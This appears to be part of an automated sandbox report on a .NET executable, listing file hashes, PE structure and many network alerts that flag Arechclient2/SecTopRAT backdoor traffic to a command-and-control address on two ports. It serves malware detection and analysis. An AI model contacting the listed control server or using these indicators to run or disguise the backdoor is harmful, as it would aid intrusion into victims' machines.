                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):6.80933482022886
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Kyuo21uNlG.exe
                                          File size:786'944 bytes
                                          MD5:2b209f07c6251e367835fbf30e7c348e
                                          SHA1:cd5534d4871aeba9351941cf548b2e63f492a609
                                          SHA256:a499adf007df84fc58178a1fd861138c078731760bea948501259c8e83e19783
                                          SHA512:95fe64d09ad91a8db600969279834e8ef6bbc2371fe3afdd3d88f351cddc858a4b247bcbae1d4351914e0ab720d9372e342e2513c68d64086afc7c388fc0678d
                                          SSDEEP:12288:uvsXZv8km0OHcbGbvzWHz0HnquwMr+g0ssFWylkkoAbtEgIwfNqbYS2VbICKMIUx:ZfPz0HvSg0ssFlSjBcT
                                          TLSH:A0F45BEF7B4BEE32DEE9337C48FF4D0992A1D3A79181914A148894D00FE479E9749AC1
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......O................................. ........@.. .......................`.............................................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x4c17ae
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:
                                          Time Stamp:0x4FB6B3ED [Fri May 18 20:41:17 2012 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc17540x57.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x600.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc40000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xbf7b40xbf80009c364071ee261a7a70d19531ea4721eFalse0.5492118656168408data6.816467095523557IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xc20000x6000x600184108ad9052a0ed317c67029f679e67False0.3984375data3.916490886173445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xc40000xc0x200a6180b771d2bd7eaf9e0dc20e3572bd8False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xc20a00x2d4data0.430939226519337
                                          RT_MANIFEST0xc23740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                          DLLImport
                                          mscoree.dll_CorExeMain
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-11-28T13:39:02.605748+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:02.737268+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:02.857967+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:02.978189+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:03.098541+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:03.218911+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:03.339993+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:03.460463+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:03.580554+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:03.700537+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:03.810385+01002029217ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init145.141.84.16815647192.168.2.449730TCP
                                          2024-11-28T13:39:03.810560+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:03.930687+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:04.051051+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:04.171683+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:04.291826+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:04.524071+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:04.644208+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44973045.141.84.16815647TCP
                                          2024-11-28T13:39:07.501207+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973145.141.84.1689000TCP
                                          2024-11-28T13:39:09.149989+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973245.141.84.1689000TCP
                                          2024-11-28T13:39:10.789910+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973345.141.84.1689000TCP
                                          2024-11-28T13:39:12.415846+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973445.141.84.1689000TCP
                                          2024-11-28T13:39:14.009083+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973545.141.84.1689000TCP
                                          2024-11-28T13:39:15.542087+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973645.141.84.1689000TCP
                                          2024-11-28T13:39:15.542087+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973645.141.84.1689000TCP
                                          2024-11-28T13:39:17.140441+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973745.141.84.1689000TCP
                                          2024-11-28T13:39:18.680644+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973845.141.84.1689000TCP
                                          2024-11-28T13:39:20.312721+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973945.141.84.1689000TCP
                                          2024-11-28T13:39:20.312721+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973945.141.84.1689000TCP
                                          2024-11-28T13:39:21.902667+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974145.141.84.1689000TCP
                                          2024-11-28T13:39:21.902667+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44974145.141.84.1689000TCP
                                          2024-11-28T13:39:23.522706+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44974345.141.84.1689000TCP
                                          2024-11-28T13:39:25.154117+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974445.141.84.1689000TCP
                                          2024-11-28T13:39:25.154117+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44974445.141.84.1689000TCP
                                          2024-11-28T13:39:26.749083+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44974745.141.84.1689000TCP
                                          2024-11-28T13:39:28.345826+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974945.141.84.1689000TCP
                                          2024-11-28T13:39:28.345826+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44974945.141.84.1689000TCP
                                          2024-11-28T13:39:29.977727+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975045.141.84.1689000TCP
                                          2024-11-28T13:39:31.625008+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44975245.141.84.1689000TCP
                                          2024-11-28T13:39:31.625008+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975245.141.84.1689000TCP
                                          2024-11-28T13:39:33.222466+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975345.141.84.1689000TCP
                                          2024-11-28T13:39:34.762339+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975445.141.84.1689000TCP
                                          2024-11-28T13:39:36.981105+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975545.141.84.1689000TCP
                                          2024-11-28T13:39:38.619160+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975645.141.84.1689000TCP
                                          2024-11-28T13:39:40.258478+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975745.141.84.1689000TCP
                                          2024-11-28T13:39:41.837423+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44975845.141.84.1689000TCP
                                          2024-11-28T13:39:41.837423+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975845.141.84.1689000TCP
                                          2024-11-28T13:39:43.415097+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44975945.141.84.1689000TCP
                                          2024-11-28T13:39:44.994184+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976045.141.84.1689000TCP
                                          2024-11-28T13:39:46.586171+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44976145.141.84.1689000TCP
                                          2024-11-28T13:39:46.586171+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976145.141.84.1689000TCP
                                          2024-11-28T13:39:48.170454+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976245.141.84.1689000TCP
                                          2024-11-28T13:39:49.947572+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976345.141.84.1689000TCP
                                          2024-11-28T13:39:51.495333+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976445.141.84.1689000TCP
                                          2024-11-28T13:39:53.041809+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44976545.141.84.1689000TCP
                                          2024-11-28T13:39:53.041809+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976545.141.84.1689000TCP
                                          2024-11-28T13:39:54.680630+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44976645.141.84.1689000TCP
                                          2024-11-28T13:39:54.680630+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976645.141.84.1689000TCP
                                          2024-11-28T13:39:56.306803+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976745.141.84.1689000TCP
                                          2024-11-28T13:39:57.857156+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976845.141.84.1689000TCP
                                          2024-11-28T13:40:07.209428+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44976945.141.84.1689000TCP
                                          2024-11-28T13:40:07.209428+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44976945.141.84.1689000TCP
                                          2024-11-28T13:40:08.838892+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44978345.141.84.1689000TCP
                                          2024-11-28T13:40:10.525996+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44978745.141.84.1689000TCP
                                          2024-11-28T13:40:12.123021+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44979345.141.84.1689000TCP
                                          2024-11-28T13:40:13.712398+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44979845.141.84.1689000TCP
                                          2024-11-28T13:40:15.290685+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44980045.141.84.1689000TCP
                                          2024-11-28T13:40:15.290685+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44980045.141.84.1689000TCP
                                          2024-11-28T13:40:16.843353+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44980445.141.84.1689000TCP
                                          2024-11-28T13:40:16.843353+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44980445.141.84.1689000TCP
                                          2024-11-28T13:40:18.431014+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44980845.141.84.1689000TCP
                                          2024-11-28T13:40:21.491941+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44981345.141.84.1689000TCP
                                          2024-11-28T13:40:21.491941+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44981345.141.84.1689000TCP
                                          2024-11-28T13:40:23.118493+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44982145.141.84.1689000TCP
                                          2024-11-28T13:40:24.716158+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44982545.141.84.1689000TCP
                                          2024-11-28T13:40:24.716158+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44982545.141.84.1689000TCP
                                          2024-11-28T13:40:26.334197+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44982845.141.84.1689000TCP
                                          2024-11-28T13:40:27.922756+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44983445.141.84.1689000TCP
                                          2024-11-28T13:40:27.922756+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44983445.141.84.1689000TCP
                                          2024-11-28T13:40:29.509919+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44983945.141.84.1689000TCP
                                          2024-11-28T13:40:29.509919+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44983945.141.84.1689000TCP
                                          2024-11-28T13:40:31.058977+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44984145.141.84.1689000TCP
                                          2024-11-28T13:40:31.058977+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44984145.141.84.1689000TCP
                                          2024-11-28T13:40:32.661092+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44984645.141.84.1689000TCP
                                          2024-11-28T13:40:32.661092+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44984645.141.84.1689000TCP
                                          2024-11-28T13:40:34.291194+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44985245.141.84.1689000TCP
                                          2024-11-28T13:40:34.291194+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44985245.141.84.1689000TCP
                                          2024-11-28T13:40:35.841017+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44985545.141.84.1689000TCP
                                          2024-11-28T13:40:35.841017+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44985545.141.84.1689000TCP
                                          2024-11-28T13:40:37.477393+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44986045.141.84.1689000TCP
                                          2024-11-28T13:40:37.477393+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44986045.141.84.1689000TCP
                                          2024-11-28T13:40:39.010162+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44986545.141.84.1689000TCP
                                          2024-11-28T13:40:39.010162+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44986545.141.84.1689000TCP
                                          2024-11-28T13:40:40.650289+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44987045.141.84.1689000TCP
                                          2024-11-28T13:40:40.650289+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44987045.141.84.1689000TCP
                                          2024-11-28T13:40:43.344168+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44987345.141.84.1689000TCP
                                          2024-11-28T13:40:44.886131+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44987945.141.84.1689000TCP
                                          2024-11-28T13:40:44.886131+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44987945.141.84.1689000TCP
                                          2024-11-28T13:40:46.480623+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44988245.141.84.1689000TCP
                                          2024-11-28T13:40:46.480623+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44988245.141.84.1689000TCP
                                          2024-11-28T13:40:47.544779+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44989045.141.84.16815647TCP
                                          2024-11-28T13:40:47.732172+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44989045.141.84.16815647TCP
                                          2024-11-28T13:40:48.030188+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44988845.141.84.1689000TCP
                                          2024-11-28T13:40:48.761807+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44989045.141.84.16815647TCP
                                          2024-11-28T13:40:48.833000+01002029217ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init145.141.84.16815647192.168.2.449890TCP
                                          2024-11-28T13:40:49.621495+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44989245.141.84.1689000TCP
                                          2024-11-28T13:40:51.219233+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44989645.141.84.1689000TCP
                                          2024-11-28T13:40:51.967836+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44990145.141.84.16815647TCP
                                          2024-11-28T13:40:52.252025+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44990145.141.84.16815647TCP
                                          2024-11-28T13:40:52.806633+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44990045.141.84.1689000TCP
                                          2024-11-28T13:40:53.163084+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44990645.141.84.16815647TCP
                                          2024-11-28T13:40:53.405285+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44990645.141.84.16815647TCP
                                          2024-11-28T13:40:53.477189+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44990645.141.84.16815647TCP
                                          2024-11-28T13:40:54.247697+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44990645.141.84.16815647TCP
                                          2024-11-28T13:40:54.387585+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44990445.141.84.1689000TCP
                                          2024-11-28T13:40:54.387585+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44990445.141.84.1689000TCP
                                          2024-11-28T13:40:54.410196+01002029217ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init145.141.84.16815647192.168.2.449906TCP
                                          2024-11-28T13:40:56.948683+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44990945.141.84.1689000TCP
                                          2024-11-28T13:40:56.948683+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44990945.141.84.1689000TCP
                                          2024-11-28T13:40:58.041114+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44991345.141.84.16815647TCP
                                          2024-11-28T13:40:58.253774+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44991345.141.84.16815647TCP
                                          2024-11-28T13:40:58.495646+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44991245.141.84.1689000TCP
                                          2024-11-28T13:40:59.086750+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44991345.141.84.16815647TCP
                                          2024-11-28T13:40:59.206923+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44991345.141.84.16815647TCP
                                          2024-11-28T13:40:59.282056+01002029217ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init145.141.84.16815647192.168.2.449913TCP
                                          2024-11-28T13:41:00.044429+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44991445.141.84.1689000TCP
                                          2024-11-28T13:41:00.716468+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44991645.141.84.16815647TCP
                                          2024-11-28T13:41:01.008223+01002051910ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity1192.168.2.44991645.141.84.16815647TCP
                                          2024-11-28T13:41:01.702921+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44991545.141.84.1689000TCP
                                          2024-11-28T13:41:01.702921+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44991545.141.84.1689000TCP
                                          2024-11-28T13:41:01.958149+01002029217ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init145.141.84.16815647192.168.2.449916TCP
                                          2024-11-28T13:41:03.247744+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44991745.141.84.1689000TCP
                                          2024-11-28T13:41:04.794916+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44991845.141.84.1689000TCP
                                          2024-11-28T13:41:06.339533+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44991945.141.84.1689000TCP
                                          2024-11-28T13:41:06.339533+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44991945.141.84.1689000TCP
